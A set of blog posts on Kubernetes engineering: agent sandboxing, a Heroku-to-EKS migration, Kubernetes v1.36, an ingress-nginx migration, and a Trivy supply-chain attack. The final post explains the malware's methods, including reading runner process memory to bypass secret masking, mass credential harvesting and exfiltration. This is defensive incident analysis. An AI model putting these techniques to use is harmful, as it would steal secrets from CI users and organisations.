    - to:
        - namespaceSelector:
            matchLabels:
              name: model-gateway
      ports:
        - protocol: TCP
          port: 443
    - to:
        - namespaceSelector:
            matchLabels:
              name: telemetry
      ports:
        - protocol: TCP
          port: 4317

Also make the service account boring:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: llm-agent
automountServiceAccountToken: false

If the workload does not need Kubernetes API access, do not mount a token. If it does, bind only the exact verbs it needs.

Benchmark Plan

I am not going to fake GPU numbers from a laptop. The package needs a real GPU node before publishing final performance claims.

This is the harness I would run:

Runtime	Cold start p50	Cold start p95	Tokens per second	RSS overhead	Notes
runc	TODO	TODO	TODO	TODO	baseline
gVisor	TODO	TODO	TODO	TODO	syscall boundary
Kata	TODO	TODO	TODO	TODO	VM per pod
Firecracker	TODO	TODO	TODO	TODO	strongest code runner candidate

The important part is measuring the right things. Startup time matters for bursty agents. Throughput matters for inference. RSS overhead matters because GPU nodes are already expensive. Operational failure modes matter more than all three.

The Takeaway

If you are running a normal model server, Kubernetes plus standard hardening may be enough.

If you are running tool using agents, code execution, tenant prompts, or workloads with broad egress, plain pods are the wrong abstraction. Use Kubernetes for scheduling. Use sandboxed runtimes for containment. Keep policy enforcement outside the model path where possible.

Kubernetes is still the control plane. It just should not be the only security boundary.

References

CNCF: https://www.cncf.io/blog/2026/04/30/ai-sandboxing-is-having-its-kubernetes-moment/
Kubernetes Agent Sandbox: https://kubernetes.io/blog/2026/03/20/running-agents-on-kubernetes-with-agent-sandbox/
llm-d joins CNCF: https://www.cncf.io/blog/2026/03/24/welcome-llm-d-to-the-cncf-evolving-kubernetes-into-sota-ai-infrastructure/
gVisor: https://github.com/google/gvisor
Kata Containers: https://katacontainers.io/
Firecracker containerd: https://github.com/firecracker-microvm/firecracker-containerd

We Didn't Migrate Systems. We Migrated Assumptions: Heroku to EKS at Scale

Mateen Anjum — Sun, 17 May 2026 05:15:45 +0000

TL;DR: I'm speaking at Open Source Summit North America 2026 in Minneapolis on Monday, May 18, about moving a fast-growing invoicing SaaS off Heroku onto EKS. This post is the long version of that talk: the three failures that nearly rolled the whole thing back, the open source decisions that saved it, and the honest numbers on what it cost. The one line I keep coming back to: we didn't migrate systems, we migrated assumptions.

If you're at OSS NA, the session is Monday at 5:25pm CDT in Room 200F. If you're not, this is everything I'd tell you over coffee afterward.

The platform

The product was a fast-growing invoicing SaaS. About 2 million active small business merchants, roughly 33 million invoices a year, enterprise clients with contractual SLAs we couldn't afford to miss.

The architecture was already 47 Node.js microservices on Heroku, with SQS for events and Redis for sessions. The engineering team was 10 people, 2 of us on platform.

I want to be precise about the title. The services were already micro. The platform was the monolith. Everything routed through one PaaS that made a lot of decisions for us, quietly, and those decisions were exactly the ones that broke when we left.

What broke at scale

Four things, all at once, all getting worse:

API latency sitting at 700ms p99, with no obvious lever to pull because we'd hit the Heroku dyno scaling ceiling.
A deploy pipeline that took 45 minutes or more, against enterprise SLAs we kept missing.
No container-level observability, so we were guessing.
A monthly bill that had quietly crossed the line where it cost more than the value it returned.

We ran the decision honestly. Stay on Heroku and accept the ceiling. Rewrite for serverless and eat the rewrite cost. Move to raw AWS VMs and get cost relief but no velocity. Or move to EKS, the highest-risk, highest-ceiling option. We picked EKS, and we picked it knowing it was the riskiest path on the board.

We failed three times before it worked

This is the part most migration writeups skip. Here's what actually happened.

Attempt 1: the invisible throttle

The PDF generation service went from 800ms p99 to 9 seconds. Dashboards showed 35% CPU. Everything looked fine and nothing was fine.

The CFS scheduler enforces CPU limits in 100ms slices. At a 500m limit, you get 50ms of CPU per 100ms period. Node.js libuv spawns 4 worker threads, V8 garbage collection runs separately, so you've got around 6 threads fighting over that 50ms window. A crypto operation that takes 15ms unthrottled stretches to 200ms under contention. Average CPU looked low because the process spent most of its time throttled, not running.

The metric that told the truth was container_cpu_cfs_throttled_periods_total, not CPU utilization.

Lesson: a 500m CPU limit isn't a number. It's a 50ms-per-100ms scheduling rule, and Heroku had been hiding that from us by letting dynos burst.

Attempt 2: the DNS amplification tax

Heroku's resolv.conf had options ndots:1. The EKS default is ndots:5. That one number difference turned api.stripe.com, which has 2 dots, into roughly 10 DNS packets per lookup because the resolver walks the search domains before trying the name as-is.

We made about 150,000 Stripe calls a day. That became 1.5 million DNS queries. Across every external integration, around 12 million unnecessary DNS queries a day, and CoreDNS was the thing falling over.

There was a second trap layered on top. An npm ci during the Docker build produced a valid lockfile, just not the same one Heroku's slug cache had been running. A drifted agentkeepalive version recycled connections every 15 seconds instead of 30, which doubled the lookup rate before we'd even noticed the first problem.

Lesson: ndots:5 turns every short hostname into 10x DNS amplification, and your dependency tree can quietly make it worse.

Attempt 3: the connection pool death spiral

A Tuesday deploy. Thirty seconds later the connection pool was exhausted at 450 against a 400 limit. Sixty seconds in, SIGTERM was being ignored and connections were leaking. Two minutes in, it had exhausted the shared Postgres connections on the Heroku side too, so now both environments were down.

Root cause was one line in a Dockerfile. CMD npm start is shell form, which makes PID 1 /bin/sh, and /bin/sh swallows SIGTERM. The Node process never got the signal, never drained, never shut down cleanly. CMD ["node", "server.js"] is exec form, PID 1 is node, and the signal arrives.

The fix was three things stacked: PgBouncer in transaction mode to cap real connections around 80, exec-form CMD so SIGTERM lands, and an actual SIGTERM handler that drains gracefully.

Lesson: PID 1 is a contract. Shell form breaks the contract.

The pattern

The question I had to sit with: why didn't any of our dashboards catch this? CFS, because defaults are invisible. DNS, because amplification is multiplicative, not additive. The connection pool, because PID 1 betrayed us in a way no metric was watching.

That's where the talk's spine comes from. We didn't migrate systems. We migrated assumptions. Every platform hides a different class of failure, and the only safe way through is incremental, observable, reversible.

The four decisions that mattered most

People ask why we didn't just use AWS directly. The answer is that four decisions cost less to make once at the platform layer than to carry per-team forever. All four are open source.

Traffic shifting with Istio. We rejected DNS-based routing and ALB weighted target groups and landed on Istio. Canary in steps: 5%, 25%, 50%, 100%, with rollback as a single config change that takes seconds, no redeploy, no DNS propagation. Istio is heavy. Our adoption was deliberately light, and mTLS came free with the mesh.

Observe before you migrate. Prometheus with Thanos for long-term cross-cluster metrics, Grafana showing Heroku and EKS side by side on the same panels, Elastic Stack for centralized structured logging. We collected 2 weeks of baseline before moving a single byte. You cannot migrate what you cannot measure.

PR-driven infrastructure with Atlantis. Open a PR, Atlantis runs terraform plan, the diff lands in the PR comment, you approve and comment atlantis apply, and it executes and audits itself. The on-call engineer at 2am no longer has to wonder who ran apply from their laptop, because nobody does. It also took me out of the critical path as a bottleneck.

Deploys are git commits with Flux. HelmRelease resources for declarative deploys, drift detection that auto-corrects the inevitable manual kubectl apply, and within a month everyone was working through git because it was simply easier than not.

The database cutover used dual-write to RDS with checksum-validated continuous replication. When we flipped it, the cutover was anticlimactic. That's exactly what we wanted.

The results

The headline numbers:

Metric	Before	After	Change
API latency p99	700ms	70ms	down 90%
Deploy time	45 min	4 min	down 91%
Monthly incidents	12	2	down 83%
Deploy frequency	2/week	15/day	up 50x
Monthly cost	baseline	60%+ lower	right-sizing + spot + Karpenter

I don't like a 90% number with no explanation, so here's where the 630ms went. Routing variance was about 250ms, Istio least-connection routing versus Heroku's effectively random routing. Network topology was around 160ms, pod-to-pod inside the VPC instead of a public path with TLS renegotiation. Resource isolation was about 125ms, with CFS throttling going from 65% of periods to under 2%. Connection pooling was the remaining 95ms from PgBouncer transaction mode.

And the part that belongs in every honest migration post: this absorbed 2 platform engineers full-time for 5 months, plus roughly 30% of 8 application engineers' time. Nothing here was free.

Developer experience after the move

Simple for developers means complicated for the platform team, and that's the trade we chose to own. Heroku's superpower was git push heroku main. We weren't going to beat that, so we got close with an internal developer portal built on Backstage. A scaffolder template stands up a new service in about 5 minutes. Kubernetes complexity stayed our problem, not the developers' problem. That's how a 10-person team scaled to 100 on a platform 2 of us maintained.

What almost stopped us

Istio sidecar injection added about 8 seconds to pod startup until we tuned readiness probe timeouts across every service. Flux reconciliation during peak hours triggered rolling restarts until we scheduled reconciliation windows. cert-manager TLS rotation broke active connections until we added graceful connection draining, which we should have had from day one.

Migration is not over. It's a beginning. We're still working on cost-attribution dashboards in Backstage and evaluating Istio Ambient mode.

What we gave back

None of this runs without code other people wrote. So we contributed back: 49 CNCF DevStats contributions in 2026, 22 merged upstream PRs across 14 projects in the last three months, spanning observability, Kubernetes, security, and developer tooling. A cert-manager maintainer's review on one of them, "this is a super cool contribution," is the kind of feedback that makes the loop worth closing.

Open source is the equalizer

Here's the thing I'll close the talk on. A 2-person platform team in Ontario, Canada ran the same infrastructure stack as companies 100 times our size. The team grew from 10 engineers to 100. The service count went from 47 to 47, still, because the platform absorbed the growth instead of the codebase. The platform team went from 2 people to 2 people.

That's only possible because thousands of contributors built the tools we stand on. Open source is what let a small team in a mid-market company run infrastructure that used to require a department.

Should you migrate?

git push heroku main is still the best deploy UX I've ever used, and half the Fortune 500 still runs on Heroku for good reason. Migrate if you have 2 or more platform engineers, steady scaling pressure, some Kubernetes exposure on the team, and a PaaS limit you've actually hit. Don't migrate yet if you're a solo platform owner, your workload is steady-state, nobody has Kubernetes time, or Heroku still meets your needs.

If your team isn't ready for the highest-risk, highest-ceiling option, that's not a failure. That's a correct read of your situation.

Come say hi

If you're at Open Source Summit North America 2026, the talk is Monday, May 18, 5:25pm CDT, Room 200F at the Minneapolis Convention Center. I'll hang around after for the parts that don't fit in 25 minutes, and there are plenty.

Slides and the full list of the 22 merged PRs are at phonotech.ca/ossna26.

Kubernetes v1.36 Drops April 22: What Platform Engineers Actually Need to Know

Mateen Anjum — Sat, 18 Apr 2026 04:54:58 +0000

TL;DR: Kubernetes v1.36 releases April 22, 2026. The headline features are DRA GPU partitioning, workload-aware preemption for AI/ML jobs, and the permanent removal of the gitRepo volume plugin. Ingress-nginx is also officially retired. If you run AI inference workloads or care about cluster security, this release is not optional reading.

Why This Release Matters More Than Most

The CNCF's 2025 annual survey dropped a number that stopped a lot of people mid-scroll: 66% of organizations hosting generative AI models now use Kubernetes for some or all of their inference workloads. That's not a trend, that's a fait accompli. Kubernetes is the AI compute substrate whether you planned for it or not.

v1.36 is the release that leans into that reality. The bulk of the new work is in Dynamic Resource Allocation (DRA), gang scheduling, and topology-aware placement, all of which exist because running distributed AI/ML jobs on Kubernetes has historically been painful. This release makes it less painful.

But there are also breaking changes and security fixes that affect everyone, not just the ML crowd. Let me walk through what actually matters.

The Breaking Changes First

gitRepo Volume Plugin: Gone for Good

If you're still using gitRepo volumes, stop reading and go fix that right now. The plugin has been deprecated since v1.11 and is now permanently disabled in v1.36. No feature flag, no workaround.

The reason it's gone is serious: gitRepo allowed attackers to run code as root on the node. It was a known attack vector for years. The right replacement is an init container running git clone, or a git-sync sidecar. Both are well-documented and production-proven.

# Before (broken in v1.36)
volumes:
  - name: code
    gitRepo:
      repository: "https://github.com/example/repo"
      revision: "main"

# After: use an init container
initContainers:
  - name: git-sync
    image: registry.k8s.io/git-sync/git-sync:v4.2.1
    args:
      - --repo=https://github.com/example/repo
      - --branch=main
      - --root=/git
      - --one-time
    volumeMounts:
      - name: code
        mountPath: /git

Ingress-NGINX Is Retired

SIG Network and the Security Response Committee retired ingress-nginx on March 24, 2026. No more releases, no more security patches. Existing deployments keep running, but you're on your own for CVEs from here.

The community's recommended alternatives are Envoy Gateway (CNCF graduated), Cilium Gateway API, and Traefik. If you're on ingress-nginx in production, this is your migration window. Don't wait for the next CVE to force your hand.

service.spec.externalIPs Deprecated

The externalIPs field in Service specs is being deprecated (full removal planned for v1.43). It's been a known vector for man-in-the-middle attacks since CVE-2020-8554. You'll see deprecation warnings starting in v1.36. Migrate to LoadBalancer services, NodePort, or Gateway API.

The AI/ML Features That Actually Change How You Work

DRA: Partitionable Devices (Beta)

This is the one I'm most excited about. v1.36 promotes DRA support for partitionable devices to beta, meaning it's enabled by default. A single GPU can now be split into multiple logical units and allocated to different workloads.

Before this, if you had an H100 and a workload that only needed 20% of it, you either wasted 80% or ran a separate MIG configuration outside Kubernetes. Now the scheduler handles it natively.

apiVersion: resource.k8s.io/v1beta1
kind: ResourceClaim
metadata:
  name: partial-gpu
spec:
  devices:
    requests:
    - name: gpu-slice
      deviceClassName: nvidia.com/gpu
      count: 1
      # Request a partition, not the whole device
      selectors:
      - cel:
          expression: device.attributes["nvidia.com/gpu"].partitionable == true

For platform teams running shared GPU clusters, this is a significant cost lever. You can pack more inference workloads onto the same hardware without sacrificing isolation.

Workload-Aware Preemption (Alpha)

Standard Kubernetes preemption works pod-by-pod. For distributed AI/ML jobs, that's a disaster: preempt one pod from a training job and the whole job stalls, wasting all the resources it's still holding.

v1.36 introduces workload-aware preemption via PodGroups. The scheduler now treats a group of related pods as a single entity. When it needs to make room for a high-priority job, it preempts entire groups rather than individual pods.

apiVersion: scheduling.k8s.io/v1alpha1
kind: PodGroup
metadata:
  name: training-job-a
spec:
  minMember: 8
  priorityClassName: high-priority
  gangSchedulingPolicy:
    disruptionMode: PodGroup  # preempt the whole group, not individual pods

This is alpha, so it's off by default. But if you're running Kueue or JobSet for batch AI workloads, this is worth enabling in a test cluster now.

Pod-Level Resource Managers (Alpha)

For HPC and AI/ML workloads, NUMA alignment matters. Previously, the Topology Manager only worked at the container level. If you had a training container plus logging and monitoring sidecars in the same pod, you couldn't guarantee they all landed on the same NUMA node.

v1.36 adds pod-scope resource management: you can now set pod.spec.resources and have the Topology Manager treat the entire pod as a single scheduling unit. All containers get resources from the same NUMA node.

spec:
  resources:
    requests:
      cpu: "16"
      memory: "64Gi"
  topologySpreadConstraints:
    - maxSkew: 1
      topologyKey: topology.kubernetes.io/numa-node
      whenUnsatisfiable: DoNotSchedule

DRA Resource Availability Visibility (Alpha)

Finally, a native way to answer "how many GPUs are free in this cluster?" without writing custom tooling.

kubectl create -f - <<EOF
apiVersion: resource.k8s.io/v1alpha1
kind: ResourcePoolStatusRequest
metadata:
  name: check-gpus
spec:
  driver: nvidia.com/gpu
EOF

kubectl get rpsr/check-gpus -o yaml
# Returns: totalDevices, allocatedDevices, availableDevices per node

This is alpha, but it's the kind of operational visibility that platform teams have been hacking around for years.

The Stability Improvements

SELinux Volume Labeling: Now GA

Faster pod startup on SELinux-enforcing systems. This replaces recursive file relabeling with a single mount-time label, which can cut pod startup time significantly on large volumes. It's been in beta since v1.28 and is now stable and on by default.

If you're running RHEL or any SELinux-enforcing OS, you'll notice this immediately.

External ServiceAccount Token Signing: GA

The kube-apiserver can now delegate token signing to external KMS or HSM systems. For clusters with strict key management requirements (financial services, healthcare, government), this removes a significant compliance gap.

Graceful Leader Transition (Alpha)

Control plane components (kube-controller-manager, kube-scheduler) used to call os.Exit() when losing leader election, forcing a full restart. v1.36 introduces graceful transitions: the component moves to follower state and re-enters the election without restarting. Faster failover, less noise in your control plane logs.

Stale Controller Mitigation (Alpha)

Large clusters with high churn have always had a subtle bug: a controller creates a resource, its cache hasn't updated yet, and it tries to create the same resource again. v1.36 adds cache freshness tracking so controllers check whether their local state is current before reconciling. Fewer duplicate creates, fewer spurious errors in busy clusters.

HPA Scale-to-Zero (Alpha)

The Horizontal Pod Autoscaler can now scale deployments to zero replicas based on external metrics (queue depth, custom metrics). When the queue is empty, the deployment goes to zero. When work arrives, it scales back up. This is the missing piece for event-driven workloads that don't need to run 24/7.

What to Do Before April 22

Audit gitRepo volumes. Run kubectl get pods -A -o json | jq '.items[].spec.volumes[]? | select(.gitRepo != null)'. If you get output, you have work to do.
Plan your ingress-nginx migration. Check kubectl get ingressclass and kubectl get pods -A | grep ingress-nginx. If you're running it, pick a replacement and start testing.
Check for externalIPs usage. kubectl get svc -A -o json | jq '.items[] | select(.spec.externalIPs != null) | .metadata.name'
Enable DRA partitionable devices in staging. If you run GPU workloads, this is worth testing before it becomes the default everywhere.
Read the full changelog. The CHANGELOG-1.36.md is dense but worth scanning for anything specific to your stack.

The Bigger Picture

v1.36 isn't a flashy release. There's no single feature that rewrites how Kubernetes works. What it is, is a release that takes the AI/ML workload story seriously at the scheduler and resource allocation level, while cleaning up years of accumulated security debt.

The gitRepo removal and ingress-nginx retirement are overdue. The DRA work is genuinely new capability. And the gang scheduling improvements are the kind of thing that makes distributed training jobs actually reliable on Kubernetes instead of just theoretically possible.

If you're running AI inference at scale, v1.36 is the release you've been waiting for. If you're running anything else, it's a solid maintenance release with a few security items you can't ignore.

Resources:

ingress-nginx Is Dead: How I Migrated to Gateway API Before It Became a Liability

Mateen Anjum — Tue, 07 Apr 2026 18:15:05 +0000

ingress-nginx was archived on March 24, 2026 after a string of critical CVEs including a 9.8 CVSS unauthenticated RCE. Gateway API v1.4 is the CNCF-graduated replacement. I used ingress2gateway 1.0 to convert 40+ Ingress resources to HTTPRoutes, validated the output, and cut over with zero downtime. Here's exactly how I did it.

Why This Happened

In March 2025, CVE-2025-1974 (dubbed "IngressNightmare") dropped: a CVSS 9.8 unauthenticated remote code execution vulnerability in ingress-nginx's admission webhook. Any attacker with network access to the webhook could execute arbitrary code inside the controller pod, which typically has broad cluster permissions. That was bad enough on its own.

Then came 2026. Four more HIGH-severity CVEs landed in quick succession:

CVE	Severity	What It Does
CVE-2025-1974	CRITICAL 9.8	Unauthenticated RCE via admission webhook
CVE-2026-1580	HIGH	Config injection leading to privilege escalation
CVE-2026-24512	HIGH	Path injection through nginx config manipulation
CVE-2026-24513	HIGH	Authentication bypass
CVE-2026-24514	HIGH	Annotation abuse for unauthorized access

On March 24, 2026, the ingress-nginx repository was officially archived. Read-only. No more patches. No more CVE fixes. If you're still running it, you're running unpatched software with known critical vulnerabilities.

This wasn't a surprise deprecation. The Kubernetes community had been building Gateway API for years as the successor to the Ingress resource. But the CVE storm turned "migrate when convenient" into "migrate now."

Gateway API: What Actually Changed

Gateway API isn't just "Ingress v2." It fundamentally changes how traffic routing is modeled in Kubernetes by splitting responsibilities across three layers:

Layer 1: GatewayClass (Infrastructure Admin)

The infrastructure team defines what gateway implementation is available. Think of it as the "which load balancer technology" decision.

apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: production-gateway
spec:
  controllerName: gateway.envoyproxy.io/gatewayclass-controller

Layer 2: Gateway (Cluster Operator)

The platform team creates Gateway resources that bind to a GatewayClass. This is where you define listeners, ports, TLS certificates, and which namespaces can attach routes.

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: main-gateway
  namespace: gateway-infra
spec:
  gatewayClassName: production-gateway
  listeners:
    - name: https
      protocol: HTTPS
      port: 443
      tls:
        mode: Terminate
        certificateRefs:
          - name: wildcard-tls
      allowedRoutes:
        namespaces:
          from: Selector
          selector:
            matchLabels:
              gateway-access: "true"
    - name: http
      protocol: HTTP
      port: 80

Layer 3: HTTPRoute (Application Developer)

Application teams define their own routing rules without touching the gateway configuration. They just reference the Gateway they want to attach to.

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: my-api
  namespace: my-api
spec:
  parentRefs:
    - name: main-gateway
      namespace: gateway-infra
  hostnames:
    - "api.example.com"
  rules:
    - matches:
        - path:
            type: PathPrefix
            value: /v1
      backendRefs:
        - name: api-service
          port: 8080

This separation matters because it maps to how teams actually operate. Infrastructure admins pick the implementation. Platform engineers configure the gateway. App developers define their routes. Nobody steps on each other's toes, and RBAC enforces the boundaries.

Why This Is Better Than Annotations

With ingress-nginx, everything was shoved into annotations. Rate limiting, CORS, timeouts, rewrites, all of it crammed into nginx.ingress.kubernetes.io/* strings that were:

Non-standard: Every controller had its own annotation format
Unvalidated: Typo an annotation name? Silent failure
Unstructured: Complex configs as string values
Non-portable: Locked to one implementation

Gateway API uses typed CRD fields. Your IDE autocompletes them. The API server validates them. They work across implementations.

The Migration: Using ingress2gateway 1.0

On March 20, 2026, ingress2gateway 1.0 shipped with support for 30+ ingress-nginx annotations. This was the tool that made bulk migration practical.

Step 1: Install

brew install ingress2gateway
# or
go install github.com/kubernetes-sigs/ingress2gateway@v1.0.0

Step 2: Scan and Convert

# Convert everything cluster-wide
ingress2gateway print --providers=ingress-nginx --all-namespaces > gwapi.yaml

# Or target a specific namespace
ingress2gateway print --namespace my-api --providers=ingress-nginx > gwapi.yaml

# If you've chosen your implementation, use emitter flags
ingress2gateway print --emitter envoy-gateway --providers=ingress-nginx --all-namespaces > gwapi.yaml

Step 3: Review the Output

Here's what a typical translation looks like.

Before (Ingress with ingress-nginx annotations):

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: my-api
  annotations:
    nginx.ingress.kubernetes.io/cors-allow-origin: "https://app.example.com"
    nginx.ingress.kubernetes.io/cors-allow-methods: "GET, POST, OPTIONS"
    nginx.ingress.kubernetes.io/cors-enable: "true"
    nginx.ingress.kubernetes.io/proxy-read-timeout: "60"
    nginx.ingress.kubernetes.io/use-regex: "true"
spec:
  ingressClassName: nginx
  tls:
    - hosts:
        - api.example.com
      secretName: api-tls
  rules:
    - host: api.example.com
      http:
        paths:
          - path: /api/v[0-9]+/users
            pathType: ImplementationSpecific
            backend:
              service:
                name: users-service
                port:
                  number: 8080

After (Gateway API HTTPRoute):

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: my-api
spec:
  parentRefs:
    - name: main-gateway
      namespace: gateway-infra
  hostnames:
    - "api.example.com"
  rules:
    - matches:
        - path:
            type: RegularExpression
            value: "/api/v[0-9]+/users"
      filters:
        - type: ResponseHeaderModifier
          responseHeaderModifier:
            set:
              - name: Access-Control-Allow-Origin
                value: "https://app.example.com"
              - name: Access-Control-Allow-Methods
                value: "GET, POST, OPTIONS"
      timeouts:
        backendRequest: 60s
      backendRefs:
        - name: users-service
          port: 8080

The structure is cleaner. CORS headers are explicit. The regex path type is a first-class field instead of being toggled by an annotation. Timeouts are typed durations, not string-encoded integers.

What ingress2gateway Cannot Translate

The tool is good, but it's not magic. Watch for these:

Custom Lua snippets. If you used nginx.ingress.kubernetes.io/server-snippet or configuration-snippet with custom Lua or raw nginx config, those have no Gateway API equivalent. You'll need to reimplement that logic in your application or use implementation-specific policies.

Rate limiting. ingress-nginx rate limiting annotations don't map to standard Gateway API fields. Most implementations offer their own rate limiting CRDs (like Envoy Gateway's BackendTrafficPolicy).

ModSecurity / WAF rules. If you had ModSecurity enabled via annotations, you'll need a separate WAF solution or an implementation that supports it natively.

Session affinity. Cookie-based session affinity annotations need implementation-specific configuration in Gateway API.

Custom error pages. These were nginx-specific and need to be handled at the application level or through implementation extensions.

ingress2gateway will print warnings for annotations it can't convert. Read every warning. I found three services silently losing rate limiting configs that would have caused issues in production.

Choosing a Gateway API Implementation

Gateway API is a spec. You need an implementation. Here's how I evaluated the main options:

Implementation	Backed By	Best For	Notes
Envoy Gateway	Envoy Proxy / CNCF	General purpose, feature-rich	Strong community, good docs
kgateway	Solo.io	Advanced traffic management	Commercial support available
Cilium Gateway	Isovalent/Cisco	eBPF-native networking	Great if you already run Cilium CNI
NGINX Gateway Fabric	F5/NGINX	Familiar nginx users	Uses nginx under the hood
Istio Waypoint	Google/Solo.io	Service mesh integration	If you're already on Istio

I went with Envoy Gateway. It's CNCF-backed, has broad feature coverage, and doesn't require buying into a service mesh. The --emitter envoy-gateway flag in ingress2gateway generates implementation-specific extensions where needed, which saved manual work.

My Migration Checklist

Here's the checklist I followed. Steal it.

Pre-migration:
[ ] Inventory all Ingress resources: kubectl get ingress --all-namespaces
[ ] Document custom annotations per Ingress
[ ] Identify any custom nginx configs (ConfigMap, snippets)
[ ] Install Gateway API CRDs: kubectl apply -f https://github.com/kubernetes-sigs/gateway-api/releases/download/v1.4.0/standard-install.yaml
[ ] Deploy chosen Gateway API implementation

Conversion:
[ ] Run ingress2gateway print and capture output
[ ] Review ALL warnings from ingress2gateway
[ ] Manually handle untranslatable annotations
[ ] Create GatewayClass and Gateway resources
[ ] Create ReferenceGrant resources for cross-namespace refs

Validation:
[ ] Apply HTTPRoutes to staging cluster
[ ] Test every endpoint (automated: curl + expected status codes)
[ ] Verify TLS termination works
[ ] Check CORS headers in browser dev tools
[ ] Validate regex paths match correctly
[ ] Load test to confirm no performance regression

Cutover:
[ ] Update DNS or switch load balancer target
[ ] Monitor error rates for 30 minutes
[ ] Keep old Ingress resources (don't delete yet)
[ ] After 48 hours stable: remove old Ingress resources
[ ] Uninstall ingress-nginx controller

Results

After migrating 40+ Ingress resources across 12 namespaces:

Metric	Before	After
Known CVEs	5 (1 critical)	0
Annotation sprawl	180+ annotations	0 (typed fields)
Cross-namespace routing	Manual workarounds	Native ReferenceGrant
Downtime during migration	N/A	Zero
Time to complete	N/A	3 days (including validation)

Lessons Learned

Don't wait for the archive notice. Gateway API has been stable since v1.0 (October 2023). I should have started earlier. The CVE pressure made this more stressful than it needed to be.

ingress2gateway is a starting point, not a finish line. It handled about 85% of our config automatically. The remaining 15% required understanding both the old nginx annotations and the new Gateway API model.

The three-layer model pays off immediately. Within a week of the migration, our app teams were creating their own HTTPRoutes without filing tickets to the platform team. That alone justified the effort.

Test regex paths carefully. The regex syntax between nginx and Gateway API implementations can differ subtly. I caught two path patterns that matched differently under Envoy than they did under nginx.

Keep the old Ingress resources around. Don't delete them the moment Gateway API routes are working. Give yourself a rollback window. I kept ours for 48 hours before cleanup.

Resources:

Your Security Scanner Was the Weapon: Inside the Trivy Supply Chain Attack

Mateen Anjum — Sat, 28 Mar 2026 17:40:45 +0000

TL;DR: Trivy, the most widely used container scanning action in GitHub Actions, was compromised on March 19, 2026. A threat actor poisoned 76 of its 77 version tags. Every pipeline that ran a scan silently handed over SSH keys, cloud credentials, Kubernetes tokens, and more. The scan appeared to succeed. You'd never know.

The Setup

I've had Trivy in my pipelines for years. Container scanning on every PR, every merge, every deploy. It's one of those things you set up once and stop thinking about, which is exactly what makes this attack so effective.

On March 19, 2026, a threat actor group called TeamPCP force-pushed malicious commits to 76 of the 77 version tags in the aquasecurity/trivy-action GitHub repository. All 7 tags in aquasecurity/setup-trivy were also compromised. If your workflow referenced Trivy by a tag (which is how basically everyone references GitHub Actions), you were running their code.

The scanner still ran. Your pipeline still went green. You had no idea.

How It Actually Happened

This attack didn't start on March 19. It started weeks earlier.

Late February 2026: An automated bot called "hackerbot-claw" exploited a misconfigured GitHub Actions workflow and stole a privileged Personal Access Token from Aqua Security's CI environment. The attacker used this to push malware to the Trivy VS Code extension on Open VSX.

March 1: Aqua Security disclosed the incident publicly via a GitHub discussion and rotated credentials. Except the rotation was incomplete. One service account, one PAT, one residual access path, still live.

March 19, 17:43 UTC: Using the still-valid credentials, TeamPCP force-pushed malicious commits to 76 of 77 tags in trivy-action and all 7 tags in setup-trivy. The compromised commits spoofed legitimate maintainer identities. GitHub itself flagged them with "This commit does not belong to any branch on this repository" but that warning is easy to miss in a workflow log.

March 19, 18:22 UTC: A rogue commit published a malicious Trivy binary as v0.69.4 across every distribution channel simultaneously: GitHub Releases, GHCR, Docker Hub, ECR Public, deb/rpm repositories, and get.trivy.dev.

March 20, 05:40 UTC: Aqua remediated the trivy-action tags. The window was roughly 12 hours.

March 22: The attacker pushed additional malicious Docker Hub images (v0.69.5, v0.69.6, latest) using separately compromised Docker Hub credentials, bypassing all GitHub controls. Same day, 44 repositories in Aqua's aquasec-com GitHub org were defaced using a stolen service account token that bridged both orgs.

March 24: The campaign expanded to Checkmarx KICS and LiteLLM PyPI packages (1.82.7, 1.82.8).

The takeaway here is not just that a tool got compromised. It's that incomplete remediation turned a single breach into a three-week campaign.

What the Payload Did

This is the part that should make you uncomfortable.

The malicious entrypoint.sh prepended about 105 lines of attack code before the legitimate Trivy scanner logic. The scan completed normally. Your logs looked fine.

Stage 1: Process enumeration. The script scanned /proc/*/environ across all runner processes, extracting environment-level secrets, filtering for anything with env or ssh in the name.

Stage 2: Memory scraping. Here's where it gets clever. On GitHub-hosted runners, a base64-encoded Python script located the Runner.Worker process, read its memory maps via /proc/{PID}/maps, and scraped raw process memory via /proc/{PID}/mem. It was targeting GitHub Actions secrets specifically, looking for JSON structures matching "name":{"value":"...","isSecret":true}.

This matters because it bypassed GitHub Actions' secret masking. Values that would show as *** in your logs were extracted in plaintext from process memory. There's no log artifact. Nothing looked wrong.

On self-hosted runners, a different payload did broad filesystem harvesting across 50+ target paths:

SSH private keys and configs
Cloud credentials (AWS, GCP, Azure)
Kubernetes configs and service account tokens
Docker registry credentials
Database credentials (MySQL, PostgreSQL, MongoDB, Redis)
Terraform state files and variables
Ansible vaults and Helm values
.env files and API keys
Git credentials and shell history
Cryptocurrency wallet keys

Stage 3: Encryption. Collected data was encrypted with AES-256-CBC using a randomly generated session key, then the session key was wrapped with a hardcoded 4096-bit RSA public key. Only the attacker's server could decrypt it.

Stage 4: Exfiltration. Primary channel was an HTTPS POST to scan.aquasecurtiy[.]org, a typosquatted domain designed to look like Aqua Security's legitimate domain (note the extra 'i' in 'security'). Resolves to 45.148.10.212 in Amsterdam.

Fallback: if the C2 was unreachable and a GitHub PAT was in the environment, the malware created a public repository named tpcp-docs and uploaded stolen data as release assets, turning GitHub itself into the exfiltration channel.

Are You Affected?

Check these specific exposure windows:

Component	Affected Versions	Exposure Window	Safe
trivy binary	v0.69.4	~3h (Mar 19)	v0.69.3 or earlier
trivy Docker Hub	v0.69.5, v0.69.6, latest	~10h (Mar 22–24)	v0.69.3 or earlier
trivy-action	Tags 0.0.1–0.34.2	~12h (Mar 19–20)	v0.35.0+ or SHA-pinned
setup-trivy	All 7 tags	~12h (Mar 19–20)	SHA-pinned
LiteLLM PyPI	1.82.7, 1.82.8	Mar 24+	1.82.6 or earlier

If you ran Trivy in any pipeline during those windows and weren't pinning to a commit SHA, you have to assume secrets were stolen. All of them. Every secret accessible from that runner environment.

What You Need to Change

This is the remediation checklist, ordered by priority.

1. Rotate first, investigate second

If you were in the exposure window, rotate everything the runner could have touched. Don't wait for confirmation. Treat every secret as compromised:

AWS access keys and IAM roles
GCP service account keys
Azure service principals
